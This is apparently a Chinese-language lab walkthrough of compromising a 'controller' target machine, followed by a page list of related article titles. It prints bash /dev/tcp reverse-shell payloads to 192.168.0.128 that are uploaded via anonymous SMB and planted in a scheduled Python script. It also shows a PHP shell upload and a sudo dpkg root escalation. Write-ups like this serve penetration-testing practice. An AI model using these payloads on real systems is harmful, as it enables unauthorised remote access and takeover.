1. IP

  2. 端口

  3. 目录扫描

    发现是 wordpress ,使用 wpscan 扫描一下,并没有发现存在漏洞的插件,但是扫描到了一个用户 control ,但是没有爆破出来

  4. 访问80端口

    文档说明我们可以上传一个项目,并可以被运行

  5. 服务器还开放了 139,445 端口,访问 SMB 服务

    可以匿名访问

  6. 上传 shell.txt

    import commands
    commands.getoutput('/bin/bash -c "/bin/bash -i >& /dev/tcp/192.168.0.128/4444 0>&1"')
    
  7. 监听本地4444端口成功反弹shell

  8. 发现用户 webserv 在本地8080端口运行了一个网站

  9. 使用 frp 将目标端口 8080 代理到本地的 6000 端口

  10. 目录扫描

    发现存在 upload.php

  11. 发现可以直接上传 .php 文件,成功getshell后发现无法执行命令

    使用 PHP7_UserFilter 进行绕过

  12. 检查用户拥有的文件

    find / -user webservice 2>/dev/null
    

    查看 website.py 文件

    import socket
    import sys
    import osscan = '127.0.0.1'
    port = 80s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(1)
    check = s.connect_ex((scan,port))
    if check == 0:os.system("echo 'website up'>> /opt/logs/log.txt")
    else:os.system("echo 'website down'>> /opt/logs/log.txt")
    s.close
    sys.exit(0)
    

    替换payload

    import socket
    import sys
    import osos.system('/bin/bash -c "bash -i >& /dev/tcp/192.168.0.128/5555 0>&1"')
    

    监听5555端口反弹shell

  13. 执行sudo -l

    利用 dpkg 提权

    TF=$(mktemp -d)
    echo 'exec /bin/sh' > $TF/x.sh
    fpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF
    
    sudo dpkg -i x_1.0_all.deb
    

靶机渗透日记 controller相关推荐

  1. HA: SHERLOCK 靶机渗透取证

    HA: SHERLOCK 靶机渗透取证 靶机描述: DescriptionHA: Sherlock! This lab is based on the famous investigator's jo ...

  2. [网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)

    这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可 ...

  3. [HTB]“Heist”靶机渗透详细思路

    今天我们来看一下hackthebox里的一个靶机"Heist",直接开始渗透. 一.信息搜集 先打开网站看看.是一个登陆框,使用弱口令和注入都无果.在网页中发现了 login as ...

  4. [网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(三)

    这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步.前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施.这篇文章将讲 ...

  5. 【渗透测试】靶机渗透Vulnhub-bulldog

    目录 前言 一.bulldog靶机安装 二.bulldog靶机渗透 1.信息搜集 2.Web渗透--后台登录 3.Web渗透--命令注入&nc反弹shell 4.权限提升 渗透步骤回顾 感悟 ...

  6. 靶机渗透【bulldog】

    文章目录 *一. bulldog靶机安装* 1. 下载bulldog 2. 开启bulldog *二. bulldog靶机渗透* 1. 信息收集 2. Web渗透 3. 命令注入&nc反弹sh ...

  7. Bulldog靶机渗透

    Bulldog靶机渗透 1. 获取地址IP,确定靶机IP是192.168.119.134 2.扫描目标主机信息 3.爆破目标主机目录 4.通过翻译得知这个网页是给承包商看的 5.查看网页的源码,查找有 ...

  8. 【VulnHub靶机渗透】一:BullDog2

    在网上各位大佬WriteUp的帮助下,成功完成了第一次完整的靶机渗透测试(大佬NB!),现将详细过程及原理做简单整理. 文章目录 简介 渗透步骤 1.主机发现.端口扫描 2.Web扫描.漏洞发现 3. ...

  9. bulldog2 靶机渗透

    bulldog2 靶机渗透 1.先做主机发现 2.查看目标靶机开通的服务,发现目标靶机只开通了80端口 3.使用http服务登录主页 4.发现网站关闭了注册功能 5.发现用户遍历漏洞 6.查看下载好的 ...

最新文章

  1. 理解 Delphi 的类(十) - 深入方法[9] - 调用时的括号
  2. CentOS 下线,TencentOS Server 全新登陆带来最强支持
  3. 不依赖jstack的java 线程dump和死锁检查工具
  4. JUC与JVM并发编程学习笔记03
  5. 正则只能输入数字java_正则表达式限制输入字符,数字,汉字等
  6. 虚拟机XP系统突然变卡顿解决办法
  7. 基于Python飞机票销售系统 毕业设计-附源码141432
  8. 微信小程序章节自测--6-7-8-9-有解析
  9. (纪录片)光的故事 BBC Light Fantastic (2004)
  10. 如何产生多样的变化? 探究网络游戏Avatar的角色设计
  11. 有时候qq邮箱不显示图片
  12. 领域分类的问题_别人的问题领域
  13. 限制input 输入框只能输入纯数字/数字/中文/英文
  14. 第一次的医美体验,决定了客户的回头率
  15. action='store_true'
  16. 瞬渺光电代理THZ光谱仪成功客户
  17. PCB模块化设计24——DCDC电源模块PCB布局布线设计规范
  18. 刷脸时代,“中国式过马路”的终结
  19. 解密新华三云密码之S12516X-AF核心交换机一览众山小
  20. https://www.cnblogs.com/xinxin1994/p/5257472.html oracle 创建用户

热门文章

  1. 电子科技大学信息与软件工程学院考研复试体会
  2. Leetcode 组合总和II
  3. 关于iOS中图片处理的小结
  4. 【安全系列】setoolkit钓鱼
  5. 赶快入手12代酷睿,畅享性能飞升体验-Acer掠夺者战斧300笔记本评测
  6. idea 类识别不出来
  7. 设一个学生的信息包括学号、姓名、出生日期和性别等。把n个学生的信息放入一个集合中,可以根据学号对学生信息进行检索,并且可以根据出生日期对学生进行排序输出。
  8. 财富2019年世界500强企业爬虫(爬虫学习实践项目)
  9. 动画旋转360度位置不变
  10. 关于GPS模块数据解析-无名科创GPS模块